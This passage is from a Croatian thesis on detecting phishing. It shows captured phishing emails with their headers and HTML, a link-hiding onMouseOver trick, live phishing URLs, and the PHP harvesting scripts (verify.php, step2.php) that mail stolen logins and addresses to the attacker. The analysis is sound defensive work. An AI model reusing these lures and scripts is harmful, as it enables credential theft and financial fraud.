Otkrivanje pokušaja krađe identiteta u Internetu

SVEUČILIŠTE U ZAGREBU
FAKULTET ELEKTROTEHNIKE I RAČUNARSTVA
DIPLOMSKI ZADATAK br. 1893
Otkrivanje pokušaja krađe identiteta u Internetu
Drago Ružman
Zagreb, rujan 2011.
Sadržaj
1.
Uvod .................................................................................................................................... 1
2.
Što je phishing ..................................................................................................................... 2
3.
Izvedba................................................................................................................................. 3
3.1
Elektronička pošta ......................................................................................................... 4
3.2
Internet stranice ........................................................................................................... 11
3.3
Tipovi adresa ............................................................................................................... 20
3.4
Tijek novca.................................................................................................................. 23
3.5
Zlonamjerni programi ................................................................................................. 23
4.
Trendovi............................................................................................................................. 24
5.
Postojeća zaštita ................................................................................................................. 26
6.
5.1
Organizacije ................................................................................................................ 26
5.2
Sustavi za zaštitu ......................................................................................................... 29
Praktičan rad ...................................................................................................................... 32
6.1
Poruke ......................................................................................................................... 33
6.2
Adrese ......................................................................................................................... 33
6.3
Stranice........................................................................................................................ 34
6.4
Obrasci za unos podataka ............................................................................................ 35
6.5
Grafički elementi......................................................................................................... 35
6.6
Konačna ocjena ........................................................................................................... 35
6.7
Slabosti sustava ........................................................................................................... 36
6.8
Primjeri uporabe.......................................................................................................... 37
6.9
Testiranje sustava ........................................................................................................ 38
7.
Zaključak ........................................................................................................................... 39
8.
Literatura ........................................................................................................................... 40
1. Uvod
Od svoje prve pojave 1996. godine, napadi sa ciljem krađe identiteta na Internetu (engl.
phishing) svake godine imaju sve veće i veće razmjere. Razlog tome je niska cijena i tehnička
jednostavnost napada kojim se pogađa velik broj korisnika Interneta, a i sve veći broj
korisnika iz zemalja u razvoju koji još nisu spremni na sve izazove koje pruža Internet.
Postoje specijalizirane organizacije koje skupljaju informacije o phishing napadima i mnoge
kompanije koje pružaju vlastita rješenja za zaštitu od napada. Međutim neki od tih sustava se
temelje na korisničkoj dojavi i ni jedan od njih nije u mogućnosti potpuno zaštititi korisnika, a
nezanemariv broj korisnika nije dovoljno educiran kako bi sami mogli utvrditi radi li se o
napadu ili ne. Zbog toga postoji potreba za jednostavnom detekcijom phishing poruka na
svakom poslužitelju elektroničke pošte.
1
2. Što je phishing
Phishing je vrsta krađe osobnih podataka na Internetu. Žrtvu se navodi da ustupi osobne
podatke napadaču koji se predstavlja kao legitiman primatelj tih podataka. Kao mamac se
obično koristi zlonamjerna poruka elektroničke pošte i Internet stranica koja izgleda
legitimno, pa je zbog toga skovan naziv phishing, izvedenica engleske riječi fishing što znači
ribarenje.
Prvi napadi dogodili su se 1996. godine kad je AOL onemogućio otvaranje korisničkih računa
s lažnim brojevima kreditnih kartica. Cilj je bio prisvojiti tuđe korisničko ime i lozinku za
pristup Internetu. Ti prvi napadi su bili vrlo jednostavni. Napadači bi se žrtvama obratili
putem poruka elektroničke pošte, predstavili se kao djelatnici AOL-a i izravno tražili potrebne
podatke. Iako je suština ostala ista, današnji napadi su puno sofisticiraniji. Žrtva obično
dobiva poruku o zloupotrebi svog računa ili o nekom problemu zbog kojeg je potrebna hitna
intervencija. U poruci se napadač predstavlja kao član sustava u koji pokušava dobiti ulaz i
navodi žrtvu da posjeti internetsku stranicu čija se adresa nalazi u poruci. Internetska stranica
je obično vizualno vrlo slična, ako ne i identična, stranici koju se imitira i za koju se
pokušavaju skupiti podaci. Početna stranica najčešće sadrži polja za upis korisničkog imena i
lozinke, a daljnje stranice mogu sadržavati upite o cijelom nizu osobnih podataka ili pak
podataka vezanih uz zadani sustav. Svi uneseni podaci se pohranjuju na poslužitelju te kasnije
napadaču mogu poslužiti za neovlašten ulaz.
Ciljani sustavi u koji napadači žele dobiti ulaz mogu biti bilo koji. Najpopularniji su
bankarski sustavi, sustavi za internetsko plaćanje, a u novije vrijeme i društvene mreže te
masovne internetske igre [1].
Najpoznatije organizacije koje se bore protiv phishinga su Anti-Phishing Working Group
(APWG) i PhishTank. APWG je komercijalna organizacija i izdaje besplatne mjesečne
izvještaje s detaljnim analizama, dok je PhishTank neprofitna organizacija pod
pokroviteljstvom OpenDNS-a i sve njihove informacije su slobodne za upotrebu. Velike
kompanije poput Googlea, Microsofta i Symanteca imaju vlastita rješenja za otkrivanje
phishing napada. Najpoznatije primjene su Googleov phishing filter u Mozilla Firefoxu i
Chromeu te Microsoftov phishing filter u Internet Exploreru. Opera, koja se još uvijek nalazi
na popisu 5 najčešće korištenih preglednika, koristi PhishTankov popis phishing stranica.
Napadi se uglavnom vrše u svrhu stjecanja financijske koristi. Tu se ubrajaju i napadi ciljani
na korisnike masovnih internetskih igara u kojima se uspješni korisnički profili, ali i virtualna
dobra prodaju za stvarni novac.
Iako je phishing poznat već dugi niz godina, broj napada i njihova sofisticiranost je s
vremenom u konstantnom porastu. To se posebno odnosi na zemlje u razvoju gdje
informatička pismenost na vrlo niskoj razini, a Internet sve prisutniji [1].
2
3. Izvedba
Za uspješan phishing napad potrebno je pripremiti Internet stranicu koja je vizualno identična
stranicama organizacije na koju se cilja. Zatim je potrebno sastaviti poruku koja žrtvu navodi
da posjeti pripremljenu Internet stranicu i upiše tražene podatke. Tu poruku je žrtvi potrebno
dostaviti elektroničkom poštom. Da bi žrtva povjerovala poruci, poruka mora biti uvjerljiva.
Uvjerljivost se postiže korištenjem stilova i grafika koje imitirana organizacija i inače koristi
te tonom poruke koji naglašava važnost i hitnost. Kad korisnik posjeti phishing stranicu, od
njega se najčešće traži unos korisničkog imena i lozinke kao i za ulaz na pravu stranicu.
Međutim, u nekim napadima se osim ovih osnovnih, traže i mnogi drugi podaci. Moguće je da
napadač traži unos sigurnosnih pitanja i odgovora na ta pitanja, a ako se radi o bankama,
napadač može tražiti brojeve kreditnih kartica, PIN-ove, datum rođenja, stvarno ime i
prezime, te razne druge podatke.
Nakon što dođe do žrtvinih podataka, napadač mora djelovati brzo i iskoristiti podatke prije
nego žrtva shvati da se radilo o prijevari i zablokira kompromitirane račune. Ako se radi o
financijskim institucijama, žrtvin novac se najčešće prebacuje u inozemstvo preko institucija
poput eGolda ili Western Uniona. eGold je dugo bio napadačima najomiljeniji alat za ilegalne
transakcije jer su vlasnici odbijali vlastima davati bilo kakve informacije o transakcijama koje
se provode. To se u novije vrijeme promijenilo, pa istražitelji mogu dobiti podatke koje traže,
međutim još uvijek nije moguće zaustaviti jednom pokrenutu transakciju i spriječiti isplatu
novca u inozemstvu [3].
Cijeli phishing napad može propasti iz nekoliko razloga. Najranjivije su poruke elektroničke
pošte. Budući da se te poruke distribuiraju istim kanalima kao i ostala neželjena pošta, filteri
na poslužiteljima elektroničke pošte napadačeve poruke eliminiraju te napad na potencijalnu
žrtvu propada. Osim filtera, problem predstavlja masovno širenje poruka, tj. slanje na sve
adrese koje napadač posjeduje, pa mnogi primatelji ne koriste usluge imitirane organizacije i
napad propada. Phishing poruke i Internet stranice često sadrže greške, što iskusnijeg
korisnika navodi na sumnju te napad propada. Ako poruka dođe do prave osobe, i ta osoba
postupi prema uputama, onda napadač dobiva vrijedne podatke koje može iskoristiti protiv
žrtve.
Prema organiziranosti, napadače je moguće razvrstati u dvije kategorije [4]. Prvu kategoriju je
moguće opisati pomoću "handwerker" modela. To su napadači koji rade potpuno samostalno.
Jedna osoba kreira stranicu, šalje poruke i iskorištava dobivene podatke. Takvi napadači
obično nemaju velike tehničke vještine, pa napadi nisu sofisticirani, što je vidljivo i na
realizaciji stranica i poruka. Osim toga, njihovi tekstovi često sadrže pogreške zbog uporabe
alata za automatsko prevođenje. Samostalni napadači nemaju fleksibilnost potrebnu za
prikrivanje napada, pa često ni ne slute da mjerodavne službe prate sve njihove korake.
U drugu kategoriju pripadaju napadači koji rade prema "camorra" modelu. Prema tom modelu
napad vrši organizirana skupina. Sudionike skupine je, prema ulozi, moguće razvrstati u 3
kategorije:
1. Dizajneri stranica i poruka. Oni su zaduženi za izradu Internet stranica i poruka
elektroničke pošte čij je dizajn vješta imitacija dizajna koji koristi ciljana organizacija.
2. Osiguravatelji smještaja. Oni su zaduženi da stranica bude dostupna na Internetu.
Moguće je koristiti zakupljene poslužitelje, druge provaljene stranice ili zaražena
računala.
3
3. Financijski agenti. Oni prebacuju novac s kompromitiranih računa na račune koji se
nalaze u inozemstvu ili šalju novac putem servisa poput eGolda.
4. Organizatorovi pouzdanici. Oni sakupljaju novac koji im šalju financijski agenti te ga
šalju organizatoru.
Ti napadači su visokoorganizirani i svaki od njih dobro zna svoj posao, a osim toga svjesni su
da vlasti pokušavaju pratiti njihove aktivnosti te zbog toga ulažu velike napore u skrivanje
vlastitih tragova i ostavljanje takvih koji će istražitelje navesti na krivi put.
Pharming napadi su napadi slični phishing napadima. Bitna razlika je da se umjesto poruka
elektroničke pošte koristi trovanje DNS poslužitelja, odnosno preusmjeravanje prometa na IP
adresu koja je pod kontrolom napadača. Na primjer, moguće je za dio korisnika adresu
www.paypal.com preusmjeriti na IP adresu na kojoj se nalazi stranica pod kontrolom
napadača, a koja je vizualno identična PayPalovoj. Tako napadač može doći do žrtvinih
osobnih podataka, jer žrtva ima mnogo manje mogućnosti da otkrije da se radi o napadu. U
stvarnosti je pharming napade vrlo teško izvesti, međutim u slučaju uspjeha gubici su mnogo
veći nego kod phishing napada.
Alati kojima se napadači služe nisu poznati, međutim postoje naznake da je na crnom tržištu
moguće kupiti gotove alate za stvaranje lažnih stranica i slanje pošte [5]. Uz takve alate,
eventualnom napadaču je relativno jednostavno pripremiti tehnički dio napada. Uz to mu
ostaje samo organiziranje mreže za skupljanje novca (ukoliko se radi o napadu na financijsku
organizaciju). Za slanje pošte može koristiti već aktivne mreže računala zaraženih
malicioznim programima za širenje neželjene pošte.
3.1 Elektronička pošta
Većina poruka koje navode primatelja da posjeti neku lažnu Internet stranicu je vrlo sličnog
sadržaja. Sve one sadrže poveznicu na lažnu stranicu i tekst koji uvjerava potencijalnu žrtvu
da posjeti tu stranicu i ostavi svoje podatke. Razlozi koji se navode mogu biti vrlo raznoliki,
međutim najčešći su sljedeći:
•
pojavila se greška u osobnim podacima i korisnik ih treba čim prije ispraviti jer će
inače njegov račun biti blokiran
•
pojavila se sumnjiva transakcija iz inozemstva (za financijske institucije) i korisnik
čim prije treba provjeriti o čemu se radi
•
dogodio se kvar na poslužiteljima davatelja usluge i korisnik hitno mora obnoviti
svoje podatke
U samom početku phishinga poruke su odmah sadržavale i HTML forme u koje je bilo
potrebno upisati tražene podatke [6]. Danas više nema takvih poruka. Glavni cilj današnjih
poruka je navesti korisnika da posjeti zadanu stranicu i na njoj upiše tražene osobne podatke.
Sadržaj poruke elektroničke pošte mora biti formuliran tako da uvjeri primatelja u
autentičnost pošiljatelja i istinitost navoda koje sadrži. Da bi se to postiglo, često je u tekstu
poruke istaknuta važnost i hitnost postupka na koji se navodi korisnika. Osim toga, poruke
sadrže grafičke detalje i stilove koji se i stvarno koriste u organizaciji koju se imitira. Domena
adrese pošiljatelja poruke redovito odgovara domeni organizacije.
4
Osim toga, često se skrivaju stvarna odredišta poveznica koje su navedene da ih treba posjetiti
[6]. To se ostvaruje pomoću <a href> HTML oznake koju je moguće upotrijebiti tako da
adresa prikazana na ekranu i stvarno odredište budu različiti. Pomoću onMouseOver
javascript naredbe je moguće sakriti pravu destinaciju koja se ispisuje u statusnoj traci na dnu
prozora internet preglednika. Na slici 3.1 je dan primjer uporabe onMouseOver javascript
naredbe.
<a href="http://www.attack.com"
onMouseOver="window.status='http://www.paypal.com'; return true;"
onMouseOut="window.status=''; return true;">http://www.paypal.com
</a>
Slika 3.1: Primjer uporabe <A HREF> i onMouseOver
Iako napadači nastoje sastaviti čim bolju i uvjerljiviju poruku, uvijek postoje nedostaci u
tekstu zbog kojih bi oprezniji korisnik mogao shvatiti da se radi o prijevari. Velik broj poruka
je gramatički ili pravopisno neispravan, pa to odmah može pobuditi sumnju budući da ni
jedna ozbiljna kompanija ne bi slala takve poruke. Tekstovi poruka gotovo redovito započinju
potpuno općenito poput "Dear paypal user" ili "Dear valued costumer". To je posljedica
načina distribucije poruka. Ista se poruka šalje velikom broju korisnika, pa nije moguće
pojedinačno prozivanje. Osim toga, napadači najčešće nemaju informacija o korisnicima
organizacija koje imitiraju pa ne znaju kome treba poslati poruke. To bi odmah trebalo navesti
primatelja poruke da razmisli o autentičnosti budući da svaka organizacija zna imena svojih
članova.
Dok god adresa pošiljatelja izgleda legitimno, dio korisnika će povjerovati da je poruka
autentična. Međutim, pošiljatelj može biti bilo tko jer je u zaglavlju poruke relativno
jednostavno krivotvoriti adresu pošiljatelja. Zbog načina rada elektroničke pošte, stvarni
pošiljatelj može naći poslužitelja elektroničke pošte koji neće provjeriti da se adresa
pošiljatelja i IP adresa s koje se šalje podudaraju, pa je pod adresu pošiljatelja moguće upisati
gotovo bilo koju adresu. A da se ne bi izazvala sumnja, u tekstu se često navodi da je ovo
automatski generirana poruka i da se upiti ne šalju na tu adresu jer odgovora neće biti.
Detaljnim proučavanjem zaglavlja moguće je vidjeti da se IP adresa stvarnog pošiljatelja ne
nalazi u rasponu adresa koje koristi imitirana kompanija te da je poruka zapravo lažna.
Javascript se u poruci, osim za skrivanje stvarnih destinacija poveznica, može iskoristiti i za
preuzimanje nepoželjnih programa (engl. malware) na računalo. Takvi programi kasnije na
razne načine mogu doći do korisnikovih lozinki i drugih osobnih podataka.
Phishing poruke se žrtvama distribuiraju već uhodanim kanalima masovnog slanja neželjene
pošte (engl. spam). Tu se nalazi i prvi korak zaštite jer će dobar filter pošte uz ostale neželjene
poruke izbaciti i phishing poruke, pa do stvarnog napada nikad neće doći. Neželjena pošta se
uglavnom distribuira preko umreženih računala zaraženih nekim od zlonamjernih programa
(engl. botnets). Jedan od najpoznatijih programa je Storm crv [7]. Njega korisnici obično
dobiju elektroničkom poštom. Kad korisnik preuzme poruku i pokrene privitak (engl.
attachment), crv se instalira na računalo i pretraži sve dokumente za adresama elektroničke
pošte. Nakon toga se spaja na druga zaražena računala, pokupi tamo pronađene adrese i njima
svima dostavi adrese koje je on pronašao. Nakon toga su sva zaražena računala spremna da
proslijede bilo kakvu poruku na sve adrese koje posjeduju.
5
Na slikama 3.2, 3.3 i 3.4 je dan prikaz jedne tipične phishing poruke. Ova poruka nije bila
dostavljena žrtvi jer je na žrtvinom poslužitelju označena kao neželjena pošta. Na slikama 3.5,
3.6 i 3.7 je prikazana još jedna phishing poruka. Ta poruka cilja na korisike talijanske banke
Banca di Roma. Obje poruke su zaustavljene prilikom prolaska kroz filter na poslužitelju
iluvator.zemris.fer.hr.
Return-Path: <>
Delivered-To: bad-header-quarantine
X-Envelope-From: <[email protected]>
X-Envelope-To: <[email protected]>
X-Quarantine-ID: <H9sFFq+f5D5i>
X-Amavis-Alert: BAD HEADER Non-encoded 8-bit data (char AE hex): Subject:
PayPal\256 Account Review[...]
X-Spam-Flag: NO
X-Spam-Score: 4.973
X-Spam-Level: ****
X-Spam-Status: No, score=4.973 tag=3 tag2=6.3 kill=6.3
tests=[BAYES_50=0.001,
HTML_IMAGE_ONLY_24=1.552, HTML_MESSAGE=0.001,
HTML_SHORT_LINK_IMG_3=0.001, MIME_HTML_ONLY=1.457,
RCVD_IN_BL_SPAMCOP_NET=1.96, SUBJECT_NEEDS_ENCODING=0.001]
Received: from iluvatar.zemris.fer.hr ([127.0.0.1])
by localhost (iluvatar.zemris.fer.hr [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id H9sFFq+f5D5i for <[email protected]>;
Sat, 5 Apr 2008 05:59:13 +0200 (CEST)
Received: from labs3.cc.fer.hr (labs3.cc.fer.hr [161.53.72.21])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by iluvatar.zemris.fer.hr (Postfix) with ESMTP id 7E34D13C2B6
for <[email protected]>; Sat, 5 Apr 2008 05:59:13 +0200 (CEST)
Received: from archimede (host206-219-dynamic.7-87r.retail.telecomitalia.it [87.7.219.206])
by labs3.cc.fer.hr (8.13.8+Sun/8.12.10) with ESMTP id m354028j010913;
Sat, 5 Apr 2008 06:00:04 +0200 (CEST)
Received: from [87.7.219.206] by mail.ablusitania.com; Sat, 5 Apr 2008
05:00:04 +0100
Date: Sat, 5 Apr 2008 05:00:04 +0100
From: [email protected]
X-Mailer: The Bat! (v3.5.25) Educational
Reply-To: [email protected]
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: [email protected]
Subject: PayPal® Account Review Department
MIME-Version: 1.0
Content-Type: text/html;
charset=Windows-1252
Content-Transfer-Encoding: 7bit
Slika 3.2: Zaglavlje phishing poruke
6
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY>
<style type="text/css">
<!-style3 {font-size: 14px}
style4 {font-size: 12px; }
-->
</style>
<table width="522" border="0">
<tr>
<td><a href="https://www.paypal.com"><img
src="https://www.paypal.com/images/paypal_logo.gif" width="117" height="35"
border="0" /></a></td>
</tr>
<tr>
<td width="516"><P class="style3">Dear <strong>PayPal &reg;</strong>
customer,</P>
<P class="style3">We recently reviewed your account, and we suspect an
unauthorized transaction on your account.<BR>
Protecting
your account is our primary concern. As a preventive measure we
have temporary<strong> limited</strong> your access to sensitive
information.<BR>
Paypal features.To ensure that your account is not compromised, simply hit
"<strong>Resolution
Center</strong>" to confirm your identity as member of
Paypal.</P>
<ul class="style3">
<li> Login to your Paypal with
your Paypal username and password.</U></li>
<li> Confirm your identity as a card memeber of
Paypal.</U></li></ul>
<P class="style3"> </P>
<TABLE cellSpacing=0 cellPadding=5 width="100%" align=center
bgColor=#ffeeee>
<TBODY>
<TR>
<TD class="style3"><SPAN class=emphasis>Please confirm account information
by clicking here <A
href="http://www.cancantheclown.com/np/paypal.com/index.html"target="_self"
>Resolution
Center</A> and complete the "Steps to Remove Limitations." </SPAN></TD>
</TR>
</TBODY>
</TABLE>
<P class="style4"> </P>
<P class="style4"><strong>*</strong>Please do not reply to this message.
Mail sent to this
address cannot be answered.</P>
<P><span class="style
<P><span class="style3">Copyright © 1999-2008 PayPal. All rights
reserved.<BR>
</BODY></HTML>
Slika 3.3: Tijelo phishing poruke
7
Slika 3.4: PayPal phishing poruka
8
Return-Path: <>
Delivered-To: spam-quarantine
X-Envelope-From: <[email protected]>
X-Envelope-To: <[email protected]>
X-Quarantine-ID: <J5abCCxKqTj3>
X-Spam-Flag: YES
X-Spam-Score: 10.25
X-Spam-Level: **********
X-Spam-Status: Yes, score=10.25 tag=3 tag2=6.3 kill=6.3
tests=[BAYES_50=0.001,
FORGED_MUA_OUTLOOK=3.116, FORGED_OUTLOOK_HTML=0.001,
HIDE_WIN_STATUS=2.499, HTML_IMAGE_ONLY_24=1.552, HTML_MESSAGE=0.001,
MIME_HTML_ONLY=1.457, MSGID_FROM_MTA_HEADER=0.803,
MSOE_MID_WRONG_CASE=0.82]
Received: from iluvatar.zemris.fer.hr ([127.0.0.1])
by localhost (iluvatar.zemris.fer.hr [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id J5abCCxKqTj3 for <[email protected]>;
Sat, 5 Apr 2008 20:38:09 +0200 (CEST)
Received: from labs3.cc.fer.hr (labs3.cc.fer.hr [161.53.72.21])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by iluvatar.zemris.fer.hr (Postfix) with ESMTP id AEAC313C2BB
for <[email protected]>; Sat, 5 Apr 2008 20:38:09 +0200 (CEST)
Received: from vestelitaly.com (host83-226-static.18-80b.business.telecomitalia.it [80.18.226.83])
by labs3.cc.fer.hr (8.13.8+Sun/8.12.10) with ESMTP id m35Id3OZ011891
for <[email protected]>; Sat, 5 Apr 2008 20:39:04 +0200 (CEST)
Message-Id: <[email protected]>
Received: from User by vestelitaly.com
(MDaemon PRO v9.6.2)
with ESMTP id md50000460184.msg
for <[email protected]>; Sat, 05 Apr 2008 16:11:48 +0200
From: "UniCredit Banca Di Roma"<[email protected]>
Subject: Comunicazione Urgente Banca di Roma - Servizio Clienti
Date: Sat, 5 Apr 2008 09:58:40 -0400
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Authenticated-Sender: [email protected]
X-Spam-Processed: vestelitaly.com, Sat, 05 Apr 2008 16:11:48 +0200
(not processed: message from trusted or authenticated source)
X-MDRemoteIP: 24.11.178.38
X-Return-Path: [email protected]
X-Envelope-From: [email protected]
X-MDaemon-Deliver-To: [email protected]
X-MDAV-Processed: vestelitaly.com, Sat, 05 Apr 2008 16:11:53 +0200
Apparently-To: <[email protected]>
To: undisclosed-recipients:;
Slika 3.5: Zaglavlje phishing poruke
9
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Comunicazione Urgente</title>
</head>
<body>
<div style="width: 600px; margin: 0 auto 0 auto; border: 0px dashed black;
padding: 20px 15px 1px 15px; font-size: 12px">
<img src="http://image.bayimg.com/daihoaabb.jpg" width="600" height="60" />
<br><br><b>Gentile CLIENTE ,</b><br><br>
<p style="font-weight: bold; color: #072510; font-family: arial;"
align="justify">Nell'ambito di un progetto di verifica dei data anagrafici
forniti durante la sottoscrizione dei
servizi di Banca Di Roma e stata riscontrata una incongruenza relativa ai
dati anagrafici in
oggetto da Lei forniti all momento della sottoscrizione contrattuale. </p>
<p style="font-weight: bold; color: #072510; font-family: arial;"
align="justify">L'inserimento dei dati alterati puo costituire motivo di
interruzione del servizio secondo gli
art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a
costituire reato
penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla
legge contro il
riciclaggio e la transparenza dei dati forniti in auto certificazione.
</p>
<p style="font-weight: bold; color: #072510; font-family: arial;"
align="justify">Per ovviare al problema e necessaria la verifica e
l'aggiornamento dei dati relativi
all'anagrafica dell'Intestatario dei servizi bancari. </p>
<p style="font-weight: bold; color: #072510; font-family: arial;"
align="justify"> Effetuare l'aggiornamento dei dati cliccando sul seguente
collegamento sicuro:
<p style="font-weight: bold; color: #074580; font-family: arial;"
align="center">
<a style="color: #074580" href="http://c-24-130-151178.hsd1.ca.comcast.net/bancaroma.it/Roma.php?applicazione=index.asp">Acced
i a collegamento sicuro >></a></p>
</a><a onmouseover="rollem('2');window.status='';return true;"
onmouseout="hidem('2');" </a></td>
<div align="center" style="margin-top: 20px;MARGIN-BOTTOM: 10px; COLOR:
#666666; font-family: arial; text-align: center; background-image:
url('http://www.chase.com/ccpmweb/generic/image/footer_gradient.gif');
height: 30px">Copyright 2000 / 2008 Unicredit Banca di Roma - Privacy Norme di trasparenza - Partita IVA 06978161005
</div>
</body>
</html>
Slika 3.6: Tijelo phishing poruke
10
Slika 3.7: Banca di Roma phishing poruka
3.2 Internet stranice
Početna stranica na koju pokazuje adresa u dobivenoj poruci je najčešće identična kopija
početne stranice organizacije koju se imitira. Međutim, ako zbog specifične namjene (krađa
podataka) nije identična, i onda se koriste jednaki stilovi, grafike i logotipovi kao i na
originalu.
11
Najjednostavniji model lažne stranice sastoji se od gotovo doslovno prepisanog HTML i CSS
koda s originala uz jednu bitnu izmjenu. Da bi napadač došao do lozinki, mora preusmjeriti
adresu na koju će se proslijediti podaci nakon pritiska na gumb "SUBMIT" ili "LOGIN". To
se postiže kreiranjem jednostavne PHP skripte na poslužitelju koja ovisno o izvedbi prihvaća
GET ili POST zahtjeve te pohranjuje dobivene podatke. Nakon kreiranja PHP skripte, još je
jedino potrebno ubaciti adresu skripte u FORM oznaku u HTML dokumentu.
Lažnu stranicu je relativno jednostavno postaviti na Internet. Postoji nekoliko mogućnosti.
Prva je da se koristi besplatni poslužitelj poput freesitespace.com ili awardspace.com. To je
potpuno besplatna i relativno anonimna varijanta. Druga mogućnost je zakup prostora na
poslužitelju u zemljama koje nemaju definirane zakone o računalnom kriminalu. Treća
mogućnost je izgradnja mreže zaraženih računala (engl. botnets) koja će služiti kao HTTP
poslužitelji [8]. Jedna takva mreža može dati veliku fleksibilnost i dosta dug životni vijek
stranice. Prilikom upotrebe besplatnih poslužitelja, vrijeme gašenja stranice je relativno
kratko. Međutim, ako se koristi plaćeni hosting, pogotovo u zemljama dalekog istoka, onda
gašenje stranice može potrajati i do mjesec dana.
Povremeno su potrebne neke izmjene na lažnoj stranici da bi ona mogla služiti svojoj svrsi.
Prilikom tih izmjena može doći do gramatičkih ili pravopisnih grešaka, pogotovo ako se radi
o stranici koja nije na engleskom jeziku. Tako se na stranicama koje imitiraju češku
financijsku stranicu servis24.cz često pojavljuju izmiješani dijelovi češkog i engleskog teksta
što bi potencijalnu žrtvu sigurno trebalo navesti na sumnju. Prikaz jedne takve stranice dan je
na slici 3.8. Stranica je bila smještena na adresi http://host81-149-81-234.inaddr.btopenworld.com/www1.servis24.cz/index.htm.
Nakon što korisnik unese svoje podatke i pritisne gumb za ulaz, najčešće se ne dogodi ništa.
Ali samo prividno. Ako napadač nema namjeru doći do drugih podataka osim korisničkog
imena i lozinke, onda redovito preusmjerava korisnika na originalnu stranicu na koju je htio
ući. To može zbuniti korisnika, ali vjerojatno u tom slučaju korisnik pretpostavi da se radilo o
grešci i pokuša ponovno.
Podaci s kojima korisnik pokuša ući na lažnu stranicu se često ne provjeravaju u bazi
korisnika originalne stranice. To omogućuje da se na lažnu stranicu unesu bilo kakvi podaci i
ulaz će proći, tj. neće biti dojave o nepoznatom korisničkom imenu ili pogrešnoj lozinki.
Jedina za sad poznata iznimka su plagijati stranica talijanske banke Banca di Roma (svi
pronađeni) i neki plagijati aukcijske kompanije eBay.
Prilikom izrade lažne stranice sve poveznice osim one za slanje osobnih podataka i dalje
ostaju pokazivati na dijelove originalne stranice. Tako često ostaju dostupna, a povremeno i
istaknuta, upozorenja o phishingu i zaštiti osobnih podataka. To dodatno može zbuniti
sumnjičave korisnike i uvjeriti ih da je stranica prava.
Na Internet stranicama se često događaju manje izmjene vezane uz dizajn i podatke koji će
biti prikazani. Kad napadači odluče iskopirati neku stranicu i pripremiti napad, oni kopiraju
original koji im je dostupan u tom trenutku. U sljedećem trenutku taj original već može biti
promijenjen. Zbog toga povremeno dolazi do upotrebe zastarjelih kopija za napad. To bi česte
posjetitelje originala moglo navesti na sumnju jer se u stvarnosti ne radi povratak na prethodni
dizajn.
12
Slika 3.8: Stranica za napad na korisnike servis24.cz
Prilikom prijenosa osobnih podataka preko Interneta savjesne institucije redovito vezu
osiguravaju SSL, odnosno TLS protokolom kako bi se izbjeglo prisluškivanje i krađa
podataka. Kod učitavanja stranice osigurane SSL/TLS-om svaki Internet preglednik raznim
znakovima upozorava korisnika da se radi o sigurnoj vezi. Najčešći znakovi sigurne veze su
istaknuti HTTPS protokol umjesto HTTP i promijenjena boja adresne trake te sličica lokota u
statusnoj traci na dnu preglednika. Prilikom upotrebe SSL/TLS-a stranica koja se učitava
mora prikazati valjani certifikat koji je potpisala agencija za izdavanje certifikata. Ako je
istekao rok valjanosti certifikata ili ako potpisnik certifikata nije poznat, preglednik javlja da
certifikat nije u redu i da postoji mogućnost od kompromitiranja sigurne veze. Budući da je u
certifikat upisana i potpisana adresa stranice na koju se on odnosi nije moguće prenijeti
certifikat s jedne stranice na drugu. Zbog toga varalice izbjegavaju upotrebu sigurne veze.
Ako bi uzeli originalni certifikat, on ne bi bio valjan jer je namijenjen za drugu stranicu. Ako
13
bi pak išli u izradu certifikata, taj certifikat ne bi htjela potpisati ni jedna pouzdana agencija.
Da korisnik ne bi postao sumnjičav u pogledu sigurnosti prijenosa podataka, znakovi sigurne
veze u pregledniku nadoknađuju se sa znakovima sigurne veze (npr. SSL lokotom) i
tekstovima o sigurnosti na samoj stranici. Iz toga iskusni korisnik lako može zaključiti da se
radi o prijevari, međutim manje iskusni će povjerovati da je stranica potpuno sigurna.
Na slikama 3.9-3.11 je prikazana stranica koja se koristila za napad na korisnike Halifaxa.
Na slikama 3.12 i 3.13 je prilazan primjer napada na korisnike PayPala. Stranica je bila
aktivna
na
http://202.158.145.88/ePMS/paypal/profile/account/
security/index.html. Početna stranica je bila identična originalnoj, a nakon unosa
korisničkog imena i lozinke korisnik bi bio preusmjeren najprije na stranicu na slici 3.12, a
zatim na stranicu na slici 3.13. Prilikom pritiska na gumb za ulaz na glavnoj stranici izvršila
se skripta verify.php prikazana na slici 3.14, a prilikom pritiska na gumb SUBMIT na slikama
3.12 i 3.13 izvršile su se skripte step2.php i step3.php prikazane na slikama 3.15 i
3.16.
Slika 3.9: Primjer lažne Halifax stranice
14
Slika 3.10: Dodatni obrazac na lažnoj Halifax stranici
15
Slika 3.11: Unos osobnih podataka na lažnoj Halifax stranici
16
Slika 3.12: Primjer lažne PayPal stranice
17
Slika 3.13: Unos podataka na lažnoj PayPal stranici
18
<?
session_start();
$Email = $_POST['Email'];
$Password = $_POST['Password'];
//sending email info here
$ip = getenv("REMOTE_ADDR");
$subj = "IP - $ip | PayPal | - Login -";
$msg = "IP: $ip\n\nEmail: $Email\nPassword: $Password";
$from = "From: PayPal<[email protected]>";
mail("[email protected]", $subj, $msg, $from);
header("Location: processing1.html");
?>
Slika 3.14: Ispis skripte verify.php
<?
session_start();
$pa
$pc
$ps
$pz
=
=
=
=
$_POST['pa'];
$_POST['pa'];
$_POST['pa'];
$_POST['pa'];
//sending email info here
$ip = getenv("REMOTE_ADDR");
$subj = "IP - $ip | PayPal | - Step2 - ";
$msg = "IP: $ip\n\nPrevious Street Address: $pa\nPrevious City:
$pc\nPrevious State: $ps\nPrevious Zip: $pz";
$from = "From: PayPal<[email protected]>";
mail("[email protected]", $subj, $msg, $from);
header("Location: processing3.html");
?>
Slika 3.15: Ispis skripte step2.php
19
<?
